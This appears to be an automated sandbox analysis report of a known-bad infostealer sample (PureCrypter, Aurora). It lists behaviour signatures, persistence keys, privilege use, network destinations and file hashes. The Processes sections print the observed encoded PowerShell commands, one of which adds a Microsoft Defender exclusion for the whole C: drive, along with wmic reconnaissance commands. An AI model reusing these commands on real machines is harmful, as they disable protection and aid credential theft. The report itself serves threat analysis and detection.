Analysis Overview
SHA256
471d501162e2a5cb6aab3f4f5362ff843d05ef9f20d9fd7ea29733d3a9875747
Threat Level: Known bad
The file 5e243f79ecb539d0d1f75fce7ddfedeccee70a48 was found to be: Known bad.
Malicious Activity Summary
PureCrypter
Aurora
Detect PureCrypter injector
Loads dropped DLL
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-05 13:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-05 13:22
Reported
2023-02-05 13:25
Platform
win7-20220901-en
Max time kernel
68s
Max time network
73s
Command Line
Signatures
Aurora
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 276 set thread context of 1676 | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
Network
| Country | Destination | Domain | Proto |
| DE | 45.9.74.11:8081 | tcp |
Files
memory/840-54-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 199eb6947e63125e72f3861b06f6c58b |
| SHA1 | 729effef0ce56ca0e5bed1dc546cd7ec473aa8f0 |
| SHA256 | de8b9281b731b824ca072b0d3594b4d399b207563d9a3a556336439507029095 |
| SHA512 | 8d9269b3e3681ef0de77721904212bd701135a9900aa2307ef3caeee41afb62e7f5d38e9f7d24d272bec9ef6164e1b3ffcc817582888677d1b642db5a8a0af6a |
memory/840-56-0x0000000074DE1000-0x0000000074DE3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 7bfe67bdd2e19278aac743d48a9d490f |
| SHA1 | b599003016541fcb14fff8806f96d1a1d1e8f5ff |
| SHA256 | f70d9790310123c63f315ff17d8abea763198763b44efe9564226de673f91d96 |
| SHA512 | 1047207a1b76af6f549894791a437158ead2047565ad32496019f176507349d509b20905664fab0cf30fcc27415260a8f8d829323959fb29458dbb35de0636a2 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | ad3b7071fe2095f7e4ca0dc0c0b8faa1 |
| SHA1 | 306dd50a0fbd1652afa3d3bf3d71b26c1859026a |
| SHA256 | 83fe92bdcf03942e14f99e342c5b9afd1fd93a15799d8ed5677a3d3b2d50fc4a |
| SHA512 | d4ee312c71ed5d3a33a55666d7e6ffbcbf3a4c372097b7eb89ae89cbd3e0b0198e20ae1349c2345a6542f7ca2835697fe6d2473f2a6ed6001971cd5d8b2c7ac8 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e7537ddd62b75d68319ca1dfe6b9bf11 |
| SHA1 | 2cb4a21af1c267fe6d4dba9f69fc98607e87f83b |
| SHA256 | 507f603503438e5272cddaf5086586246ab5040dae7e51c47fabcae5a67aec82 |
| SHA512 | 07d70f19aabb03751d0699309a166d38491d1d4fd57c02ea66f30866ef3139365f11b65b1d93370ed8ebfd2dc8bf78e659cf84575b5a9a52ad35c94e25850c74 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | c033cb6da9044f4154da3bcb3387103a |
| SHA1 | a417a88f53e352ece8ef7c0d40b348d7cd784171 |
| SHA256 | ef190b960f0ce33ff0ca055efbf400f603c82bb85c5174f1e9cab9fa7d9d6336 |
| SHA512 | d8037700d5db9759f46aaa18f0c78ba71ac8d49df36d86adb2ed3026ba0d3dbd45e9659e112b78bc664dde760ab8b07fd89fe6fd66f48bdb4ca2cdcb85d5be04 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 4f3b117e33b565f92f03c7e2199c9e1c |
| SHA1 | a2fe077be04913630f2e11624144175540ba1b9d |
| SHA256 | cf8693be97868d6841436f4ee50e81d2d3a66203a81416c9b9a069bb39054340 |
| SHA512 | 00c2e1038225acf180e65728e851fe04b5cb3cf55c5c76b833a9b97ebb9c4fda3c8e8c385fa861e81b967b630d383b0bdd958edf177b256d15f0f0fdb7738553 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 2d7c3b2f03f46e83d6cb32421e7e2be0 |
| SHA1 | 0e30533413bf4f235bb32f931c8560818483e17d |
| SHA256 | 95ded91f3a43d79f3d151fd8df5d5e36d9b1847ce27714fdb24abdc743c1b106 |
| SHA512 | c65ecfcc962122ee94a6afc4fdafb374ccb49ee571d3670694edbf045ff8f8b495a56aa3a609efbb9c75c7527f0687a9e9cb2e67d8841d7ab51949ee7eb0863b |
memory/276-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | f5879abfadd060d8caabc3a158f70540 |
| SHA1 | e326e70e265db1b1eef1b9fc1fa8ff577877eebc |
| SHA256 | 914dfa77e9ee58454cab5adc48142fbd4b384f44399b10bbd687b392e0f399b4 |
| SHA512 | 215ac52521976cae98fbb50d23520ab2fe21c5f5bbc381e97cde3d6d9b26bed6cb1864640944a91fa0143a25f4d2518a82ab848e153cc04f2906525be13bc7c8 |
memory/276-65-0x0000000001050000-0x00000000017C4000-memory.dmp
memory/276-66-0x00000000063E0000-0x0000000006780000-memory.dmp
memory/1516-67-0x0000000000000000-mapping.dmp
memory/1516-69-0x000000006F530000-0x000000006FADB000-memory.dmp
memory/1516-70-0x000000006F530000-0x000000006FADB000-memory.dmp
memory/1516-71-0x000000006F530000-0x000000006FADB000-memory.dmp
memory/1012-72-0x0000000000000000-mapping.dmp
memory/564-73-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | c9e95b82778a406da539770b9844b5b8 |
| SHA1 | 8ce26d06d6b7b5d1eab5697182b873a69d671a00 |
| SHA256 | 38154ae24c1712776c359ba64407ef747305a4aaa6d8f5730af96831c2a7fd54 |
| SHA512 | e631629b44545acbe3e336c5095b149e249ab5a7e34e5b762146727cb89d9849170eac7687d3053aff676c597d89ee3abf15ccde3f98f02387a9558fde3a3464 |
memory/276-76-0x00000000052B0000-0x0000000005422000-memory.dmp
memory/1676-77-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1676-78-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1676-80-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1676-82-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1676-84-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1676-85-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1676-87-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1676-88-0x0000000000400000-0x0000000000731000-memory.dmp
memory/564-89-0x000000006F2C0000-0x000000006F86B000-memory.dmp
memory/1676-90-0x0000000000464C20-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e6316303219e281343685f1643f8a653 |
| SHA1 | fb7c692afe8928264732e238a538f832018f198c |
| SHA256 | 0f28fb602e7fee95e69322c48cab96c473aea00a879a9e55214af77d4aa5bdf0 |
| SHA512 | afd18b9ede2555281e371c89d12390f1c8a730cbc29932e75e18c9c171b6a5731eb9c0d1db83c3d6c86cd42c2da9a666e81cd47c9f8419a069ca55c0762438fc |
memory/1676-93-0x0000000000400000-0x0000000000731000-memory.dmp
memory/564-94-0x000000006F2C0000-0x000000006F86B000-memory.dmp
memory/1676-95-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1100-96-0x0000000000000000-mapping.dmp
memory/1632-97-0x0000000000000000-mapping.dmp
memory/1340-98-0x0000000000000000-mapping.dmp
memory/1744-99-0x0000000000000000-mapping.dmp
memory/872-100-0x0000000000000000-mapping.dmp
memory/1676-101-0x0000000000400000-0x0000000000731000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-05 13:22
Reported
2023-02-05 13:25
Platform
win10v2004-20221111-en
Max time kernel
138s
Max time network
147s
Command Line
Signatures
Aurora
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
Network
| Country | Destination | Domain | Proto |
| US | 72.21.91.29:80 | tcp | |
| NL | 84.53.175.11:80 | tcp | |
| US | 20.189.173.3:443 | tcp | |
| NL | 104.80.225.205:443 | tcp | |
| RU | 62.204.41.170:27941 | tcp | |
| NL | 96.16.53.137:80 | tcp | |
| NL | 96.16.53.137:80 | tcp | |
| NL | 96.16.53.137:80 | tcp | |
| DE | 45.9.74.11:8081 | tcp |
Files
memory/4912-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | ba50f2bca86ba947a8d2035bb9b35123 |
| SHA1 | a542b5c5d41174dc2475a219978123b7d14f958f |
| SHA256 | 17790c5c071280462ed8e617fd2edfff5bf0f40fb9add57f866f058fdbf24cb5 |
| SHA512 | 08fdb619e411247c571710bc47df2463c95dc2fee82025e548b65ff1a3e4a53e663fafec9bcc5cc234f32211b25f6f9472786c1be543eb71629f32ec09f04379 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | ba50f2bca86ba947a8d2035bb9b35123 |
| SHA1 | a542b5c5d41174dc2475a219978123b7d14f958f |
| SHA256 | 17790c5c071280462ed8e617fd2edfff5bf0f40fb9add57f866f058fdbf24cb5 |
| SHA512 | 08fdb619e411247c571710bc47df2463c95dc2fee82025e548b65ff1a3e4a53e663fafec9bcc5cc234f32211b25f6f9472786c1be543eb71629f32ec09f04379 |
memory/2704-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 14a9737eb666769fee7c28a00eb14e82 |
| SHA1 | ab8f2279f13a546fc32233a4da0855660fb07ec0 |
| SHA256 | a5fda7973fc4b9cf7fa14943302c0b6cd81c7615105ab0031e20fc5ed2a2396a |
| SHA512 | 973d5236da1979d31376d55f6b304fa166835d99a4574e3345e25ebed5b492cf9a3ae3f0a800d137fa8756288684b6d5c07ff97c8e5c2cbb698585f09373e9e7 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 14a9737eb666769fee7c28a00eb14e82 |
| SHA1 | ab8f2279f13a546fc32233a4da0855660fb07ec0 |
| SHA256 | a5fda7973fc4b9cf7fa14943302c0b6cd81c7615105ab0031e20fc5ed2a2396a |
| SHA512 | 973d5236da1979d31376d55f6b304fa166835d99a4574e3345e25ebed5b492cf9a3ae3f0a800d137fa8756288684b6d5c07ff97c8e5c2cbb698585f09373e9e7 |
memory/2704-138-0x0000000000550000-0x0000000000CC4000-memory.dmp
memory/2704-139-0x0000000006AD0000-0x0000000006AF2000-memory.dmp
memory/1420-140-0x0000000000000000-mapping.dmp
memory/1420-141-0x0000000002300000-0x0000000002336000-memory.dmp
memory/1420-142-0x0000000004EB0000-0x00000000054D8000-memory.dmp
memory/1420-143-0x0000000005550000-0x00000000055B6000-memory.dmp
memory/1420-144-0x00000000055C0000-0x0000000005626000-memory.dmp
memory/1420-145-0x0000000005BF0000-0x0000000005C0E000-memory.dmp
memory/1420-146-0x00000000073F0000-0x0000000007A6A000-memory.dmp
memory/1420-147-0x00000000060E0000-0x00000000060FA000-memory.dmp
memory/4244-148-0x0000000000000000-mapping.dmp
memory/396-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 6195a91754effb4df74dbc72cdf4f7a6 |
| SHA1 | aba262f5726c6d77659fe0d3195e36a85046b427 |
| SHA256 | 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5 |
| SHA512 | ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d1905bc82ea393a435265cde34ec5f4c |
| SHA1 | dda21740632614a1e62a38f43748793bc52f63de |
| SHA256 | 379cc41273bfdcc69afb1bd957aec78462bef52eff97841b4f6b23e915295a5c |
| SHA512 | d8607ddc4dc0665eefff5a1a1354b3efb0af183da4a97fd3c20e41a00f56869c3de3cc0b98f27b303706096c816f332cc3b9c3a703b261fa7a9d7dea4ae68397 |
memory/3444-152-0x0000000000000000-mapping.dmp
memory/4168-154-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | d16f03cba377d1da242948003935905d |
| SHA1 | d53fee552e6145ae324afa81f211054124502568 |
| SHA256 | 69293bc85dda101d21edff1deee7fcba1d0378aaa9ae6cce5aa920c119dadba9 |
| SHA512 | 48b057953f656cdc297ad59a09e35d48904ec7ca47ba529da927b6716d3b73c51cc4322f45b808af6a056d484871f1316c1b20dbccc3b58b010ae7b5a9074928 |
memory/1624-158-0x0000000000000000-mapping.dmp
memory/3908-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 56b84c460605b9afe06b71e48ee29ef7 |
| SHA1 | fa3dd9195f820e8e54f7d947e44580742aedf02c |
| SHA256 | 887147ede6ab7d01f1cab8f99c09be460ea45e4f85b3b973c4113bad720f5b45 |
| SHA512 | c240d464b0d1632abd6352895f2de0ac1343516bfb74675a5a06c122dcfa5e5547e9ae81fd467bb15323b0d37a88c60d50846f4fe8ae877dc3f849ad5645a509 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | c1b0f039e0ebdd40b81764b2ea039f1d |
| SHA1 | 6cf9e83e933e0fad43e16d935bff5765d672c072 |
| SHA256 | 5d3d32583b34f40bc7ba495867d879be20529af326f360dbbdc268ac28fd6a08 |
| SHA512 | 6b96d6964e5fede065af30b21b1c0d59c3de72f45f6933806e8517b9f188e477c8fb10e8bb367403949a640551125319d9e73df3916b1b569b098520d8522bbe |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 39e33320af8468e7e556924f02d47d67 |
| SHA1 | a9a077b6503e76391d0722ee2d998ec0e4812b0d |
| SHA256 | a245e5597392c4404c0d90f951bf14822693de94c439779702a42bb36a37663e |
| SHA512 | f647e412ad0e3afbec1c8ba07297e6b691314ee9dc45dbf5cdc828fdaa0bb1d951e57593a7f971d58f8d897cfe0fb9bcc4b283533ed8e9832fddbf2dc2b2ca2b |
memory/1624-160-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1624-163-0x0000000000400000-0x0000000000731000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
